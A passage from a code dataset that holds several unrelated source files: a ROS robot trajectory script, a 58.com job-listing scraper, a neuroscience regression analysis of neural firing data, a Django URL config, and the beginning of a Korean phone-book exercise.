self.trackertoo = tracker.TrackerInterface(self.defaultQuat, '/domusromus/update_pose_target')\n self.play_trajectory_topic = \"trained_poses\"\n self._play_trajectory = rospy.ServiceProxy(\"play_trajectory\", PlayTrajectory)\n\n def follow_trajectory(self, recording_file_name):\n self.tracker.start_updating_target_to_pose(self.play_trajectory_topic, [0,0,0])\n self.trackertoo.start_updating_target_to_pose(\"/domusromus/\"+self.play_trajectory_topic,[0,0,0])\n rospy.logwarn(\"Playing trajectory at \" + self.play_trajectory_topic)\n self._play_trajectory(String(self.play_trajectory_topic), String(recording_file_name))\n\nif __name__==\"__main__\":\n rospy.init_node('spoon_feeder', anonymous=True)\n recording_file_name = rospy.get_param(\"~recording_file_name\")\n s = SpoonFeeder()\n while (True):\n s.follow_trajectory(recording_file_name)\n time.sleep(5)\n","sub_path":"scripts/execute_both_trajectory_node.py","file_name":"execute_both_trajectory_node.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"58767373","text":"# -*- coding: utf-8 -*-\n\"\"\"\nspecially for 58\nAuthor: jianyu\nEmail: 544194390@qq.com\nDate: 2016/03/29\n\"\"\"\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport re\nimport setting\n\n\ndef get_pos_list(content):\n \"\"\"\n get the a list and get the 'posCont' from each web of the a tag\n :param content: 58 website url ,e.g. \"http://gz.58.com/tech/\"\n :return: a list of posCont detail, but haven't handled\n \"\"\"\n soup = BeautifulSoup(content, \"html5lib\")\n a_list = soup.find_all(\"a\", class_=\"t\", limit=setting.position_count)\n pos_list = []\n for a in a_list:\n # because of jumping, so we must use urllib to imitate\n content = urllib.request.urlopen(a['href']).read()\n soup = BeautifulSoup(content, \"html5lib\")\n position_msg = soup.find_all(class_=\"posCont\", limit=1)\n pos_list.append(position_msg)\n return pos_list\n\n\ndef space_filter(str):\n \"\"\"\n remove all the enter and space\n \"\"\"\n return str.replace('\\n', '').replace(' ', '').replace('
', ' ')\n\n\ndef tag_filter(str):\n \"\"\"\n remove all the html tag\n \"\"\"\n return re.sub('<[^>]+>', '', str)\n\n\ndef handle_content(content):\n \"\"\"\n Specifically for fetching things from a website about works\n being used in FUNCTION handle_request\n :param content: a string of html\n :return: nothing but print to screen\n\n \"http://gz.58.com/tech/\"\n \"\"\"\n\n position_list = get_pos_list(content)\n # position_list_end is the result and it will be printed out\n position_list_end = []\n position = dict()\n\n for each_position in position_list:\n position.clear()\n if len(each_position) == 0:\n return\n else:\n each_position = each_position[0]\n\n position['position_name'] = each_position.h1.string\n position['update_time'] = each_position.ul.li.span.strong.string\n soup = BeautifulSoup(str(each_position), \"html5lib\")\n position['next_url'] = soup.find_all(id=\"nextUrl\", limit=1)[0]['href']\n\n company = soup.find_all(class_=\"companyName\", limit=1)[0]\n position['company_name'] = space_filter(company.string)\n position['company_url'] = company['href']\n\n company_msg = soup.find_all(class_=\"compMsg\", limit=1)[0]\n position['company_msg'] = space_filter(company_msg.ul.li.a.string)\n\n scale = soup.find_all(class_=\"scale\", limit=1)[0]\n soup_4_scale = BeautifulSoup(str(scale), \"html5lib\")\n position['company_scale'] = str(soup_4_scale.li).\\\n replace(\"规模: \", '').\\\n replace('
  • ', '').\\\n replace('
  • ', '')\n position['company_scale'] = space_filter(position['company_scale'])\n\n pos_info_list_1 = soup.find_all(class_=\"w380\", limit=2)\n position['salary'] = pos_info_list_1[0].strong.string\n position['position_type'] = str(pos_info_list_1[1]).\\\n replace(\"招聘职位:\", '').\\\n replace('
    ', '').\\\n replace('
    ', '')\n position['position_type'] = space_filter(position['position_type'])\n\n pos_info_list_2 = soup.find_all(class_=\"fl\", limit=2)\n position['study_require'] = str(pos_info_list_2[0]).\\\n replace(\"学历要求:\", '').\\\n replace('
    ', '').\\\n replace('
    ', '')\n position['work_time'] = str(pos_info_list_2[1]).\\\n replace(\"工作年限:\", '').\\\n replace('
    ', '').\\\n replace('
    ', '')\n position['study_require'] = space_filter(position['study_require'])\n position['work_time'] = space_filter(position['work_time'])\n\n area = soup.find_all(class_=\"condition\", limit=3)\n soup_4_area = BeautifulSoup(str(area), \"html5lib\").find_all('span')\n position['work_area'] = soup_4_area[6].string\n\n pos_info_list_4 = soup.find_all(class_=\"cbSum\", limit=4)\n position['bonus'] = \"\"\n for info in pos_info_list_4:\n position['bonus'] = position['bonus'] + info.span.string + \" \"\n\n detail = soup.find_all(class_=\"borb\", limit=1)\n soup_4_detail = BeautifulSoup(str(detail[0]), \"html5lib\")\n position['detail'] = ''\n for span in soup_4_detail.find_all(\"span\"):\n position['detail'] = position['detail'] + tag_filter(str(span)) + \" \"\n position['detail'] = space_filter(position['detail'])\n\n company_introduction = soup.find_all(class_=\"compIntro\", limit=1)\n soup_4_intro = BeautifulSoup(str(company_introduction), \"html5lib\")\n position['company_introduction'] = ''\n for span in soup_4_intro.find_all(['p', 'span']):\n position['company_introduction'] = position['company_introduction'] + tag_filter(str(span)) + ' '\n position['company_introduction'] = space_filter(position['company_introduction'])\n\n for each in position:\n position[each] = tag_filter(position[each]).encode('utf-8').decode('utf-8')\n position_list_end.append(position)\n\n print(position_list_end)\n","sub_path":"contentHelper/work.py","file_name":"work.py","file_ext":"py","file_size_in_byte":5113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"85252578","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 9 12:22:26 2019\n\n@author: veronikasamborska\n\"\"\"\nimport sys\n\nsys.path.append('/Users/veronikasamborska/Desktop/ephys_beh_analysis/remapping')\nsys.path.append('/Users/veronikasamborska/Desktop/ephys_beh_analysis/preprocessing')\n\nimport remapping_count as rc \nimport numpy as np\nimport matplotlib.pyplot as plt\nimport regression_function as reg_f\nimport regressions as re\nfrom collections import OrderedDict\nfrom matplotlib import colors as mcolors\nfrom sklearn.linear_model import LinearRegression\n\n\n# ols = LinearRegression(copy_X = True,fit_intercept = False)\n# ols.fit(X_1,y_1)\n# sse = np.sum((ols.predict(X_2) - y_2)**2, axis = 0)\n# cpd = np.zeros([y.shape[1],X_2.shape[1]])\n\n# for i in range(X_1.shape[1]):\n# X_i = np.delete(X_1,i,axis=1)\n# X_i_1 = np.delete(X_2,i,axis=1)\n# ols.fit(X_i,y_1)\n# sse_X_i = np.sum((ols.predict(X_i_1) - y_2)**2, axis=0)\n# cpd[:,i]=(sse_X_i-sse)/sse_X_i\n \n# cpd = cpd.reshape(12,n_timepoints, n_predictors) \n# sse = sse.reshape(12,n_timepoints)\n# plt.figure()\n# for i in range(12):\n# plt.plot(sse[i,:])\n \n# c = np.mean(cpd, 0)\n# for i in range(cpd.shape[2]):\n# plt.plot(c[:,i])\n\ndef _CPD_cross_task(X,X1, y, y1):\n \n 'Evaluate coefficient of partial determination for each predictor in X'\n ols = LinearRegression(copy_X = True,fit_intercept = False)\n ols.fit(X1,y1)\n sse = np.sum((ols.predict(X1) - y1)**2, axis = 0)\n cpd = np.zeros([y.shape[1],X.shape[1]])\n \n for i in range(X.shape[1]):\n X_i = np.delete(X,i,axis=1)\n X_i_1 = np.delete(X1,i,axis=1)\n ols.fit(X_i,y)\n sse_X_i = np.sum((ols.predict(X_i_1) - y1)**2, axis=0)\n cpd[:,i]=(sse_X_i-sse)/sse_X_i\n \n return cpd\n\n\ndef regression_general(data):\n \n C = []\n cpd = []\n \n C_1 = []\n C_2 = []\n C_3 = []\n \n cpd_1_2 = []\n cpd_2_3 = []\n\n dm = data['DM']\n #dm = dm[:-1]\n firing = data['Data']\n #firing = firing[:-1]\n \n for s, sess in enumerate(dm):\n DM = dm[s]\n firing_rates = firing[s]\n n_trials, n_neurons, n_timepoints = firing_rates.shape\n \n if n_neurons > 10:\n session_trials_since_block = []\n\n \n state = DM[:,0]\n choices = DM[:,1]\n reward = DM[:,2]\n b_pokes = DM[:,7]\n a_pokes = DM[:,6]\n task = DM[:,5]\n block = DM[:,4]\n block_df = np.diff(block)\n taskid = rc.task_ind(task,a_pokes,b_pokes)\n \n correct_choice = np.where(choices == state)[0]\n correct = np.zeros(len(choices))\n correct[correct_choice] = 1\n \n a_since_block = []\n trials_since_block = []\n t = 0\n \n #Bug in the state? \n for st,s in enumerate(block):\n if state[st-1] != state[st]:\n t = 0\n else:\n t+=1\n trials_since_block.append(t)\n \n session_trials_since_block.append(trials_since_block)\n \n t = 0 \n for st,(s,c) in enumerate(zip(block, choices)):\n if state[st-1] != state[st]:\n t = 0\n a_since_block.append(t)\n \n elif c == 1:\n t+=1\n a_since_block.append(t)\n else:\n a_since_block.append(0)\n \n negative_reward_count = []\n rew = 0\n block_df = np.append(block_df,0)\n for r,b in zip(reward,block_df):\n \n if r == 0:\n rew += 1\n negative_reward_count.append(rew)\n elif r == 1:\n rew -= 1\n negative_reward_count.append(rew)\n if b != 0:\n rew = 0\n \n positive_reward_count = []\n rew = 0\n block_df = np.append(block_df,0)\n for r,b in zip(reward,block_df):\n \n if r == 1:\n rew += 1\n positive_reward_count.append(rew)\n elif r == 0:\n rew += 0\n positive_reward_count.append(rew)\n if b != 0:\n rew = 0\n \n positive_reward_count = np.asarray(positive_reward_count)\n negative_reward_count = np.asarray(negative_reward_count)\n choices_int = np.ones(len(reward))\n \n \n choices_int[np.where(choices == 0)] = -1\n reward_choice_int = choices_int * reward\n interaction_trial_latent = trials_since_block * state\n interaction_a_latent = a_since_block * state\n int_a_reward = a_since_block * reward\n \n interaction_trial_choice = trials_since_block*choices_int\n reward_trial_in_block = trials_since_block*positive_reward_count\n negative_reward_count_st = negative_reward_count*correct\n positive_reward_count_st = positive_reward_count*correct\n negative_reward_count_ch = negative_reward_count*choices\n positive_reward_count_ch = positive_reward_count*choices\n ones = np.ones(len(choices))\n \n \n predictors_all = OrderedDict([('Reward', reward),\n ('Choice', choices),\n #('Correct', correct),\n #('A in Block', a_since_block), \n #('A in Block x Reward', int_a_reward), \n \n ('State', state),\n ('Trial in Block', trials_since_block),\n #('Interaction State x Trial in Block', interaction_trial_latent),\n #('Interaction State x A count', interaction_a_latent),\n \n ('Choice x Trials in Block', interaction_trial_choice),\n ('Reward x Choice', reward_choice_int),\n # ('No Reward Count in a Block', negative_reward_count),\n # ('No Reward x Correct', negative_reward_count_st),\n # ('Reward Count in a Block', positive_reward_count),\n # ('Reward Count x Correct', positive_reward_count_st),\n # ('No reward Count x Choice',negative_reward_count_ch),\n # ('Reward Count x Choice',positive_reward_count_ch),\n # ('Reward x Trial in Block',reward_trial_in_block),\n \n ('ones', ones)])\n \n \n X = np.vstack(predictors_all.values()).T[:len(choices),:].astype(float)\n n_predictors = X.shape[1]\n y = firing_rates.reshape([len(firing_rates),-1]) # Activity matrix [n_trials, n_neurons*n_timepoints]\n tstats = reg_f.regression_code(y, X)\n \n C.append(tstats.reshape(n_predictors,n_neurons,n_timepoints)) # Predictor loadings\n cpd.append(re._CPD(X,y).reshape(n_neurons,n_timepoints, n_predictors))\n \n task_1 = np.where(taskid == 1)[0]\n task_2 = np.where(taskid == 2)[0]\n task_3 = np.where(taskid == 3)[0]\n \n # Task 1 \n reward_t1 = reward[task_1]\n choices_t1 = choices[task_1]\n correct_t1 = correct[task_1]\n \n a_since_block_t1 = np.asarray(a_since_block)[task_1]\n int_a_reward_t1 = int_a_reward[task_1]\n state_t1 = state[task_1]\n trials_since_block_t1 = np.asarray(trials_since_block)[task_1]\n interaction_trial_latent_t1 = interaction_trial_latent[task_1]\n interaction_a_latent_t1 = interaction_a_latent[task_1]\n interaction_trial_choice_t1 = interaction_trial_choice[task_1]\n reward_choice_int_t1 = reward_choice_int[task_1]\n negative_reward_count_t1 = negative_reward_count[task_1]\n negative_reward_count_st_t1 = negative_reward_count_st[task_1]\n positive_reward_count_t1 = positive_reward_count[task_1]\n positive_reward_count_st_t1 = positive_reward_count_st[task_1]\n negative_reward_count_ch_t1 = negative_reward_count_ch[task_1]\n positive_reward_count_ch_t1 = positive_reward_count_ch[task_1]\n reward_trial_in_block_t1 = reward_trial_in_block[task_1]\n \n firing_rates_t1 = firing_rates[task_1]\n ones = np.ones(len(choices_t1))\n \n predictors = OrderedDict([('Reward', reward_t1),\n ('Choice', choices_t1),\n ('Correct', correct_t1),\n ('A in Block', a_since_block_t1), \n ('A in Block x Reward', int_a_reward_t1), \n \n ('State', state_t1),\n ('Trial in Block', trials_since_block_t1),\n ('Interaction State x Trial in Block', interaction_trial_latent_t1),\n ('Interaction State x A count', interaction_a_latent_t1),\n \n ('Choice x Trials in Block', interaction_trial_choice_t1),\n ('Reward x Choice', reward_choice_int_t1),\n ('No Reward Count in a Block', negative_reward_count_t1),\n ('No Reward x Correct', negative_reward_count_st_t1),\n ('Reward Count in a Block', positive_reward_count_t1),\n ('Reward Count x Correct', positive_reward_count_st_t1),\n ('No reward Count x Choice',negative_reward_count_ch_t1),\n ('Reward Count x Choice',positive_reward_count_ch_t1),\n ('Reward x Trial in Block',reward_trial_in_block_t1),\n \n ('ones', ones)])\n \n X_1 = np.vstack(predictors.values()).T[:len(choices_t1),:].astype(float)\n n_predictors = X_1.shape[1]\n y_1 = firing_rates_t1.reshape([len(firing_rates_t1),-1]) # Activity matrix [n_trials, n_neurons*n_timepoints]\n tstats = reg_f.regression_code(y_1, X_1)\n \n C_1.append(tstats.reshape(n_predictors,n_neurons,n_timepoints)) # Predictor loadings\n \n \n \n # Task 2\n reward_t2 = reward[task_2]\n choices_t2 = choices[task_2]\n correct_t2 = correct[task_2]\n \n a_since_block_t2 = np.asarray(a_since_block)[task_2]\n int_a_reward_t2 = int_a_reward[task_2]\n state_t2 = state[task_2]\n trials_since_block_t2 = np.asarray(trials_since_block)[task_2]\n interaction_trial_latent_t2 = interaction_trial_latent[task_2]\n interaction_a_latent_t2 = interaction_a_latent[task_2]\n interaction_trial_choice_t2 = interaction_trial_choice[task_2]\n reward_choice_int_t2 = reward_choice_int[task_2]\n negative_reward_count_t2 = negative_reward_count[task_2]\n negative_reward_count_st_t2 = negative_reward_count_st[task_2]\n positive_reward_count_t2 = positive_reward_count[task_2]\n positive_reward_count_st_t2 = positive_reward_count_st[task_2]\n negative_reward_count_ch_t2 = negative_reward_count_ch[task_2]\n positive_reward_count_ch_t2 = positive_reward_count_ch[task_2]\n reward_trial_in_block_t2 = reward_trial_in_block[task_2]\n \n firing_rates_t2 = firing_rates[task_2]\n ones = np.ones(len(choices_t2))\n \n predictors = OrderedDict([('Reward', reward_t2),\n ('Choice', choices_t2),\n ('Correct', correct_t2),\n ('A in Block', a_since_block_t2), \n ('A in Block x Reward', int_a_reward_t2), \n \n ('State', state_t2),\n ('Trial in Block', trials_since_block_t2),\n ('Interaction State x Trial in Block', interaction_trial_latent_t2),\n ('Interaction State x A count', interaction_a_latent_t2),\n \n ('Choice x Trials in Block', interaction_trial_choice_t2),\n ('Reward x Choice', reward_choice_int_t2),\n ('No Reward Count in a Block', negative_reward_count_t2),\n ('No Reward x Correct', negative_reward_count_st_t2),\n ('Reward Count in a Block', positive_reward_count_t2),\n ('Reward Count x Correct', positive_reward_count_st_t2),\n ('No reward Count x Choice',negative_reward_count_ch_t2),\n ('Reward Count x Choice',positive_reward_count_ch_t2),\n ('Reward x Trial in Block',reward_trial_in_block_t2),\n \n ('ones', ones)])\n \n \n X_2 = np.vstack(predictors.values()).T[:len(choices_t2),:].astype(float)\n n_predictors = X_2.shape[1]\n y_2 = firing_rates_t2.reshape([len(firing_rates_t2),-1]) # Activity matrix [n_trials, n_neurons*n_timepoints]\n tstats = reg_f.regression_code(y_2, X_2)\n \n C_2.append(tstats.reshape(n_predictors,n_neurons,n_timepoints)) # Predictor loadings\n \n \n # Task 3\n reward_t3 = reward[task_3]\n choices_t3 = choices[task_3]\n correct_t3 = correct[task_3]\n \n a_since_block_t3 = np.asarray(a_since_block)[task_3]\n int_a_reward_t3 = int_a_reward[task_3]\n state_t3 = state[task_3]\n trials_since_block_t3 = np.asarray(trials_since_block)[task_3]\n interaction_trial_latent_t3 = interaction_trial_latent[task_3]\n interaction_a_latent_t3 = interaction_a_latent[task_3]\n interaction_trial_choice_t3 = interaction_trial_choice[task_3]\n reward_choice_int_t3 = reward_choice_int[task_3]\n negative_reward_count_t3 = negative_reward_count[task_3]\n negative_reward_count_st_t3 = negative_reward_count_st[task_3]\n positive_reward_count_t3 = positive_reward_count[task_3]\n positive_reward_count_st_t3 = positive_reward_count_st[task_3]\n negative_reward_count_ch_t3 = negative_reward_count_ch[task_3]\n positive_reward_count_ch_t3 = positive_reward_count_ch[task_3]\n reward_trial_in_block_t3 = reward_trial_in_block[task_3]\n \n firing_rates_t3 = firing_rates[task_3]\n ones = np.ones(len(choices_t3))\n \n predictors = OrderedDict([('Reward', reward_t3),\n ('Choice', choices_t3),\n ('Correct', correct_t3),\n ('A in Block', a_since_block_t3), \n ('A in Block x Reward', int_a_reward_t3), \n \n ('State', state_t3),\n ('Trial in Block', trials_since_block_t3),\n ('Interaction State x Trial in Block', interaction_trial_latent_t3),\n ('Interaction State x A count', interaction_a_latent_t3),\n \n ('Choice x Trials in Block', interaction_trial_choice_t3),\n ('Reward x Choice', reward_choice_int_t3),\n ('No Reward Count in a Block', negative_reward_count_t3),\n ('No Reward x Correct', negative_reward_count_st_t3),\n ('Reward Count in a Block', positive_reward_count_t3),\n ('Reward Count x Correct', positive_reward_count_st_t3),\n ('No reward Count x Choice',negative_reward_count_ch_t3),\n ('Reward Count x Choice',positive_reward_count_ch_t3),\n ('Reward x Trial in Block',reward_trial_in_block_t3),\n \n ('ones', ones)])\n \n \n X_3 = np.vstack(predictors.values()).T[:len(choices_t3),:].astype(float)\n n_predictors = X_3.shape[1]\n y_3 = firing_rates_t3.reshape([len(firing_rates_t3),-1]) # Activity matrix [n_trials, n_neurons*n_timepoints]\n tstats = reg_f.regression_code(y_3, X_3)\n \n C_3.append(tstats.reshape(n_predictors,n_neurons,n_timepoints)) # Predictor loadings\n \n cpd_1_2.append(_CPD_cross_task(X_1,X_2,y_1,y_2).reshape(n_neurons,n_timepoints, n_predictors))\n \n cpd_2_3.append(_CPD_cross_task(X_2,X_3,y_2,y_3).reshape(n_neurons,n_timepoints, n_predictors))\n \n print(n_neurons)\n \n \n \n cpd = np.nanmean(np.concatenate(cpd,0), axis = 0)\n C = np.concatenate(C,1)\n \n C_1 = np.concatenate(C_1,1)\n \n C_2 = np.concatenate(C_2,1)\n \n C_3 = np.concatenate(C_3,1)\n \n cpd_1_2 = np.nanmean(np.concatenate(cpd_1_2,0), axis = 0)\n cpd_2_3 = np.nanmean(np.concatenate(cpd_2_3,0), axis = 0)\n\n \n return C, cpd, C_1,C_2, C_3, cpd_1_2,cpd_2_3, predictors_all,session_trials_since_block\n\n\n# predictors = OrderedDict([('Reward', reward_t2),\n# ('Choice', choices_t2),\n# ('Correct', correct_t2),\n# ('A in Block', a_since_block_t2), \n# ('A in Block x Reward', int_a_reward_t2), \n# \n# ('State', state_t2),\n# ('Trial in Block', trials_since_block_t2),\n# ('Interaction State x Trial in Block', interaction_trial_latent_t2),\n# ('Interaction State x A count', interaction_a_latent_t2),\n#\n# ('Choice x Trials in Block', interaction_trial_choice_t2),\n# ('Reward x Choice', reward_choice_int_t2),\n# ('No Reward Count in a Block', negative_reward_count_t2),\n# ('No Reward x Correct', negative_reward_count_st_t2),\n# ('Reward Count in a Block', positive_reward_count_t2),\n# ('Reward Count x Correct', positive_reward_count_st_t2),\n# ('No reward Count x Choice',negative_reward_count_ch_t2),\n# ('Reward Count x Choice',positive_reward_count_ch_t2),\n# ('Reward x Trial in Block',reward_trial_in_block_t2),\n \ndef svd_on_coefs():\n \n C, cpd, C_1, cpd_1,C_2, cpd_2, C_3, cpd_3, predictors,session_trials_since_block = regression_general(HP)\n C_PFC, cpd_PFC, C_1_PFC, cpd_1_PFC,C_2_PFC, cpd_2_PFC, C_3_PFC, cpd_3_PFC, predictors,session_trials_since_block = regression_general(PFC)\n\n# predictors = OrderedDict([('Reward', reward_t2),\n# ('Choice', choices_t2),\n# ('Correct', correct_t2),\n# ('A in Block', a_since_block_t2), \n# ('A in Block x Reward', int_a_reward_t2), \n# \n# ('State', state_t2),\n# ('Trial in Block', trials_since_block_t2),\n# ('Interaction State x Trial in Block', interaction_trial_latent_t2),\n# ('Interaction State x A count', interaction_a_latent_t2),\n#\n# ('Choice x Trials in Block', interaction_trial_choice_t2),\n# ('Reward x Choice', reward_choice_int_t2),\n# ('No Reward Count in a Block', negative_reward_count_t2),\n# ('No Reward x Correct', negative_reward_count_st_t2),\n# ('Reward Count in a Block', positive_reward_count_t2),\n# ('Reward Count x Correct', positive_reward_count_st_t2),\n# ('No reward Count x Choice',negative_reward_count_ch_t2),\n# ('Reward Count x Choice',positive_reward_count_ch_t2),\n# ('Reward x Trial in Block',reward_trial_in_block_t2),\n# \n# ('ones', ones)])\n \n no_choice_idn = [0,2,5,6,7,8,9]\n choice = [1,3,4,8,10]\n task_1_HP = C_1[choice,:,:]\n task_2_HP = C_2[choice,:,:]\n \n #HP \n task_1_HP = np.transpose(task_1_HP,[0,2,1]).reshape(task_1_HP.shape[0]*task_1_HP.shape[2], task_1_HP.shape[1])\n task_2_HP = np.transpose(task_2_HP,[0,2,1]).reshape(task_2_HP.shape[0]*task_2_HP.shape[2], task_2_HP.shape[1])\n #task_3 = np.transpose(task_3,[0,2,1]).reshape(task_3.shape[0]*task_3.shape[2], task_3.shape[1])\n \n \n where_are_NaNs = np.isnan(task_1_HP)\n task_1_HP[where_are_NaNs] = 0\n where_are_NaNs = np.isinf(task_1_HP)\n task_1_HP[where_are_NaNs] = 0\n \n \n where_are_NaNs = np.isnan(task_2_HP)\n task_2_HP[where_are_NaNs] = 0\n where_are_NaNs = np.isinf(task_2_HP)\n task_2_HP[where_are_NaNs] = 0\n \n \n u_t1, s_t1, vh_t1 = np.linalg.svd(np.transpose(task_1_HP), full_matrices = False)\n t_u = np.transpose(u_t1) \n t_v = np.transpose(vh_t1) \n \n \n s_task_1 = np.linalg.multi_dot([t_u, np.transpose(task_2_HP), t_v])\n s_1 = s_task_1.diagonal()\n\n \n sum_c_task_1 = np.cumsum(abs(s_1))/task_1_HP.shape[0]\n \n plt.plot(sum_c_task_1, 'black', label = 'HP')\n plt.legend()\n \n #PFC\n task_1_PFC = C_1_PFC[choice,:,:]\n task_2_PFC = C_2_PFC[choice,:,:]\n \n \n task_1_PFC = np.transpose(task_1_PFC,[0,2,1]).reshape(task_1_PFC.shape[0]*task_1_PFC.shape[2], task_1_PFC.shape[1])\n task_2_PFC = np.transpose(task_2_PFC,[0,2,1]).reshape(task_2_PFC.shape[0]*task_2_PFC.shape[2], task_2_PFC.shape[1])\n #task_3 = np.transpose(task_3,[0,2,1]).reshape(task_3.shape[0]*task_3.shape[2], task_3.shape[1])\n \n \n where_are_NaNs = np.isnan(task_1_PFC)\n task_1_PFC[where_are_NaNs] = 0\n where_are_NaNs = np.isinf(task_1_PFC)\n task_1_PFC[where_are_NaNs] = 0\n \n \n where_are_NaNs = np.isnan(task_2_PFC)\n task_2_PFC[where_are_NaNs] = 0\n where_are_NaNs = np.isinf(task_2_PFC)\n task_2_PFC[where_are_NaNs] = 0\n \n \n u_t1, s_t1, vh_t1 = np.linalg.svd(np.transpose(task_1_PFC), full_matrices = False)\n t_u = np.transpose(u_t1) \n t_v = np.transpose(vh_t1) \n \n \n s_task_1 = np.linalg.multi_dot([t_u, np.transpose(task_2_PFC), t_v])\n s_1 = s_task_1.diagonal()\n\n \n sum_c_task_1 = np.cumsum(abs(s_1))/task_1_PFC.shape[0]\n \n plt.plot(sum_c_task_1, 'green', label = 'PFC')\n plt.legend()\n\n \ndef plot_cpd_gen(data,fig_n,title):\n \n C, cpd, C_1,C_2, C_3, cpd_1_2,cpd_2_3, predictors_all,session_trials_since_block = regression_general(data_HP)\n cpd = cpd[:,:-1]\n colors = dict(mcolors.BASE_COLORS, **mcolors.CSS4_COLORS)\n #c = [*colors][2:]\n c = ['violet', 'black', 'red','chocolate', 'green', 'blue', 'turquoise', 'grey', 'yellow', 'pink',\\\n 'purple','orange', 'darkblue', 'darkred', 'darkgreen','darkyellow','lightgreen']\n p = [*predictors_all]\n fig = plt.figure(1)\n \n fig.add_subplot(1,2,1)\n for i in np.arange(cpd.shape[1]):\n plt.plot(cpd[:,i], label =p[i], color = c[i])\n #plt.title(title)\n plt.legend()\n plt.ylabel('Coefficient of Partial Determination')\n plt.xlabel('Time (ms)')\n plt.title('HP')\n \n \n C, cpd, C_1,C_2, C_3, cpd_1_2,cpd_2_3, predictors_all,session_trials_since_block = regression_general(data_PFC)\n cpd = cpd[:,:-1]\n colors = dict(mcolors.BASE_COLORS, **mcolors.CSS4_COLORS)\n #c = [*colors][2:]\n c = ['violet', 'black', 'red','chocolate', 'green', 'blue', 'turquoise', 'grey', 'yellow', 'pink',\\\n 'purple','orange', 'darkblue', 'darkred', 'darkgreen','darkyellow','lightgreen']\n p = [*predictors_all]\n fig.add_subplot(1,2,2)\n\n for i in np.arange(cpd.shape[1]):\n plt.plot(cpd[:,i], label =p[i], color = c[i])\n #plt.title(title)\n plt.legend()\n plt.ylabel('Coefficient of Partial Determination')\n plt.xlabel('Time (ms)')\n plt.title('PFC')\n \n firing = PFC['Data'][0]\n dm = PFC['DM'][0]\n\n coef = C[6]\n coef_average = np.mean(coef, 1)\n index = np.where(coef_average > 4)[0][1]\n #index = 192\n neuron = 0\n for sess,s in enumerate(firing):\n for n in range(s.shape[1]):\n neuron+=1\n if neuron == index:\n block_plot = session_trials_since_block[sess]\n trials = s[:,n,:]\n design = dm[sess]\n \n \n # Plot mean around choice\n ch = np.mean(trials[:,22:26],1)\n plt.figure()\n plt.plot(ch)\n plt.plot(block_plot)\n plt.plot(design[:,0])\n \n ch = np.mean(trials[:,42:50],1)\n plt.figure()\n plt.plot(ch)\n plt.plot(block_plot)\n plt.plot(design[:,0])\n \n \n\n\n \n # plt.vlines(32,ymin = 0, ymax = 0.15,linestyles= '--', color = 'grey', label = 'Poke')\n# \n# predictors = OrderedDict([('Reward', reward_t2),\n# ('Choice', choices_t2),\n# ('Correct', correct_t2),\n# ('A in Block', a_since_block_t2), \n# ('A in Block x Reward', int_a_reward_t2), \n# \n# ('State', state_t2),\n# ('Trial in Block', trials_since_block_t2),\n# ('Interaction State x Trial in Block', interaction_trial_latent_t2),\n# ('Interaction State x A count', interaction_a_latent_t2),\n#\n# ('Choice x Trials in Block', interaction_trial_choice_t2),\n# ('Reward x Choice', reward_choice_int_t2),\n# ('No Reward Count in a Block', negative_reward_count_t2),\n# ('No Reward x Correct', negative_reward_count_st_t2),\n# ('Reward Count in a Block', positive_reward_count_t2),\n# ('Reward Count x Correct', positive_reward_count_st_t2),\n# ('No reward Count x Choice',negative_reward_count_ch_t2),\n# ('Reward Count x Choice',positive_reward_count_ch_t2),\n# ('Reward x Trial in Block',reward_trial_in_block_t2),\n# \n# ('ones', ones)])\n \n \n plt.ylim(0, 0.1)\n fig = plt.figure()\n for i in range(len(p)):\n task_1 = np.mean(C_1[i,:], axis = 1).flatten()\n task_2 = np.mean(C_2[i,:], axis = 1).flatten()\n # task_3 = np.mean(C_3[4,:], axis = 1).flatten()\n \n argmax_neuron = np.argsort(-task_1)\n task_2_by_1 = task_2[argmax_neuron]\n task_1 = task_1[argmax_neuron]\n #task_3_by_1 = task_3[argmax_neuron]\n \n y = np.arange(len(task_1))\n fig.add_subplot(5, 4, i+1)\n plt.scatter(y,task_2_by_1,s = 2, color = 'blue', label = 'Task 2 sorted by Task 1')\n plt.plot(y,task_1,color = 'black', label = 'Task 1 sorted')\n plt.title(p[i])\n plt.tight_layout()\n\n #plt.scatter(y,task_3_by_1,s = 2,color = 'slateblue', label = 'Task 3 sorted by Task 1')\n \n #plt.scatter(y,task_1,s = 2,color = 'black', label = 'Task 1 sorted')\n\n #plt.plot(y,task_1,color = 'black', label = 'Task 1 sorted')\n \n \n\n\n ","sub_path":"regressions/regressions_general.py","file_name":"regressions_general.py","file_ext":"py","file_size_in_byte":29133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"263825705","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n # ex: /picker/\n path('', views.HomeView.as_view(), name='index'),\n # ex: /picker/get\n path('items/', views.ItemsView.as_view(), name='items'),\n # ex: /picker/5\n path('/', views.RecipeView.as_view(), name='recipe'),\n # ex: /picker/add-recipe\n path('add-recipe/', views.AddRecipeView.as_view(), name='add-recipe'),\n # ex: /picker/add-ingredient\n path('add-ingredient/', views.AddIngredientView.as_view(), name='add-ingredient'),\n]\n","sub_path":"dishpicker/picker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"164674673","text":"# 10번_B735042_김대겸\r\n\r\n# 빈 전화번호책 리스트(phoneBook)\r\nphoneBook = []\r\ni = 0\r\n# 입력모드 시작\r\nwhile True:\r\n name = input(\"이름? \")\r\n if name == '': # 사용자가 엔터만 누르면 입력모드 종료\r\n break\r\n phoneBook.append([])\r\n phoneBook[i].append(name)\r\n phoneNum = input(\"전화번호? \")\r\n phoneBook[i].append(phoneNum)\r\n i += 1\r\nprint()\r\n# 전화번호책 출력 \r\nprint(\"전화번호책 : \", phoneBook)\r\nprint()\r\n# 검색모드\r\nwhile True:\r\n wantName = input(\"전화번호 찾고싶은 사람의 이름을 입력하세요? \")\r\n if wantName == '': # 사용자가 엔터만 누르면 검색모드 종료.\r\n break\r\n finding = 0 # 사용자가 찾고싶은 이름을 구별해줄 변수finding에 0을 저장.\r\n for i in 